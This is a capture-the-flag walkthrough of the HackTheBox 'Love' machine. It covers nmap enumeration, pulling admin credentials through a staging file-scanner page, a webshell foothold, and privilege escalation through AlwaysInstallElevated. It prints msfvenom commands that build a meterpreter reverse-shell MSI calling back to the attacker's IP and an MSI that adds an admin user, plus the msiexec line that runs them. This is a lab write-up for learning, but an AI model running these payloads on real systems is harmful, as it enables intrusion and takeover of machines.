Enum

NMAP

└─$ sudo nmap -sC -sV 10.10.10.239                                                                                                                                                                                                           
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-10 06:28 EDT                                                                                                                                                                              
Nmap scan report for 10.10.10.239                                                                                                                                                                                                            
Host is up (0.076s latency).                                                                                                                                                                                                                 
Not shown: 993 closed ports                                                                                                                                                                                                                  
PORT     STATE SERVICE      VERSION                                                                                                                                                                                                          
80/tcp   open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp  open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp  open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open  mysql?
| fingerprint-strings: 
|   LDAPSearchReq, SMBProgNeg, X11Probe, afp: 
|_    Host '10.10.16.65' is not allowed to connect to this MariaDB server
5000/tcp open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.80%I=7%D=5/10%Time=60990AD1%P=x86_64-pc-linux-gnu%r(SM
SF:BProgNeg,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.65'\x20is\x20not\x2
SF:0allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(X11Pro
SF:be,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.65'\x20is\x20not\x20allow
SF:ed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(LDAPSearchRe
SF:q,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.65'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(afp,4A,"F\0\0
SF:\x01\xffj\x04Host\x20'10\.10\.16\.65'\x20is\x20not\x20allowed\x20to\x20
SF:connect\x20to\x20this\x20MariaDB\x20server");
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h41m28s, deviation: 4h02m30s, median: 21m27s
| smb-os-discovery: 
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Love
|   NetBIOS computer name: LOVE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-05-10T03:50:08-07:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-05-10T10:50:07
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.52 seconds

HTTP

Certificate gives hints about the domain and a user.

http://love.htb/

Shows “Voting System using PHP”.

Exploring http://staging.love.htb/ there is a page beta.php which lets the user enter an URL which will fetch a file and “scan” it.

We try this out

We are not able to reach https://10.10.10.239:5000/.

If we enter this in the filescanner we get some creds to the Voting System.

Vote Admin Creds admin: @LoveIsInTheAir!!!! admin:@LoveIsInTheAir!!!!

User and foothold

With the credentials, we should be able to exploit this.

This recent exploit seems to be applicable in this case.

Uploading the webshell and triggering it will give us user.

Root

Privilege Escalation

Running winpeas we observe that AlwaysInstallElevated is on

Which we can confirm

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

We follow the [steps](msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi #No uac format)

  1. Create the payload msfvenom -p windows/x64/meterpreter/reverse_tcp -f msi lhost=10.10.16.65 lport=9005 -o bad.msi
  2. Execute the payload on victim msiexec /quiet /qn /i C:\Users\Phoebe\Desktop\bad.msi
  3. Profit